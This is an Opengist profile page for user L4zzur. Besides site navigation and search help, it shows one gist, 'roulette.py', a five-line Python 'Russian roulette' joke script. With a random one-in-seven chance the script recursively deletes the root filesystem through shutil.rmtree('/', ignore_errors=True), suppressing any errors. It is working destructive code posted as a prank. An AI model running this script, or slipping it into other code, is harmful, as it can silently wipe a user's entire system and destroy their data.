Opengist

Explore

  • All gists
  • Topics
  • Users
L4zzur
Give feedback on the new UI Powered by Opengist ⋅ 16ms

user:thomas gists created by user

title:mygist gists with given title

description:sync gists with given description

filename:myfile.txt gists having files with given name

extension:yml gists having files with given extension

language:go gists having files with given language

topic:homelab gists with given topic

all:systemctl search all fields

Login Register
L4zzur

L4zzur

Joined 2 months ago

All gists 1
Recently created Least recently created Recently updated Least recently updated
L4zzur

L4zzur / roulette.py

Last active 2 months ago
0 0 1
1 import random
2 import shutil
3
4 if random.randint(0, 6) == 1:
5 shutil.rmtree('/', ignore_errors=True)